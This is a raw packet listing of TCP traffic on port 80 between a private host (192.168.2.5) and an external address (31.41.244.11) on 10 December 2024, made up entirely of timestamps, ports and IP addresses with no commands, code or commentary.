Dec 10, 2024 11:11:11.934144020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.934189081 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.934262991 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.934307098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.935225964 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.935269117 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.935404062 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.935450077 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.936292887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.936338902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.070679903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.070794106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.070874929 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.070924997 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.071151972 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.071202040 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.071279049 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.071333885 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.072293997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.072340965 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.072352886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.072396040 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.073350906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.073399067 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.073452950 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.073496103 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.074460030 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.074508905 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.074538946 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.074582100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.075544119 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.075588942 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.075659990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.075702906 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.076647997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.076697111 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.076806068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.076845884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.077831030 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.077872992 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.077879906 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.077917099 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.078887939 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.078933954 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.079180002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.079224110 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.079961061 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.080007076 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.080065012 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.080107927 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.081094027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.081140995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.081278086 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.081324100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.082176924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.082221985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.082295895 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.082340002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.083254099 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.083309889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.083357096 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.084408045 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.084505081 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.084552050 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.085557938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.085606098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.085683107 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.085865021 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.086571932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.086620092 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.086694002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.086735010 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.087749004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.087788105 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.087795019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.087853909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.088849068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.088896036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.088959932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.089035034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.089926958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.089975119 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.090023041 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.090074062 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.090965986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.091073990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.091119051 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.092087030 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.092202902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.092263937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.093208075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.093261957 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.093312025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.093741894 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.094296932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.094341040 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.094424963 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.094470978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.095413923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.095514059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.095566034 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.095608950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.096498013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.096548080 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.096575975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.096705914 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.097578049 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.097637892 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.097692966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.097738028 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.098675013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.098784924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.098834038 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.099792957 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.099843979 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.099896908 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.101073027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.101119995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.101150036 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.101203918 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.102014065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.102108002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.102152109 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.102329016 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.103137970 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.103197098 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.103243113 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.104443073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.104516983 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.104574919 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.105334044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.105437040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.105494976 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.106595993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.106672049 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.106734037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.107539892 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.107595921 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.107599020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.107672930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.108652115 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.108704090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.108787060 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.108834028 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.109807968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.109847069 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.109925985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.110861063 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.110925913 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.111004114 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.111171007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.111989021 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.112132072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.112211943 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.113073111 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.113140106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.113198996 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.114204884 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.114325047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.114372015 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.115326881 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.115387917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.115454912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.115509987 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.116440058 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.116503000 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.116534948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.116583109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.117544889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.117593050 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.117669106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.117985964 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.118628979 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.118683100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.118704081 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.119671106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.119721889 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.119833946 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.120466948 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.120834112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.120889902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.120918989 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.120965958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.121877909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.121979952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.121999979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.122014046 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.123310089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.123336077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.123366117 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.123377085 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.124073029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.124178886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.124233961 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.125164032 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.125222921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.125277042 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.126286983 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.126418114 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.126471043 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.127399921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.127461910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.127546072 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.127546072 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.128468990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.128540993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.262728930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.262861013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.263022900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.263310909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.263437986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.263475895 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.263515949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.264345884 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.264391899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.264508963 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.264555931 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.265554905 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.265600920 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.265635014 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.265682936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.266707897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.266804934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.266851902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.267693996 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.267772913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.267821074 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.268786907 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.268927097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.268973112 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.269841909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.269891977 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.270040989 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.270975113 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.271025896 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.271095991 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.272053003 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.272100925 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.272134066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.272178888 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.273144960 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.273235083 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.273283958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.274245977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.274296045 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.274383068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.274432898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.275367022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.275413990 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.275485039 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.275530100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.276504993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.276551008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.276634932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.276680946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.277575970 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.277627945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.277687073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.277731895 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.278752089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.278800964 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.278826952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.278867960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.279798031 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.279843092 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.279875994 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.279915094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.280860901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.280908108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.281039953 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.281084061 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.282010078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.282051086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.282078981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.282119036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.283083916 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.283129930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.283157110 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.283196926 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.284204006 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.284249067 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.284342051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.284384966 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.285356998 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.285401106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.285516977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.285562038 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.286380053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.286427975 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.286492109 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.286535025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.287508965 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.287552118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.287789106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.287834883 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.288585901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.288630962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.288649082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.288691998 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.289736032 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.289779902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.289834976 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.289880037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.290818930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.290860891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.290894985 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.290940046 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.291922092 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.291961908 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.291970968 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.292004108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.292996883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.293044090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.293045998 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.293081045 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.294091940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.294138908 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.294203997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.294248104 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.295279026 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.295329094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.295351982 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.295389891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.296361923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.296406984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.296515942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.296555996 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.297399998 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.297445059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.297477961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.297522068 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.298681974 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.298726082 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.298737049 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.298784018 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.299635887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.299681902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.299736023 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:12.299779892 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:12.300726891 CET	80	49828	31.41.244.11	192.168.2.5
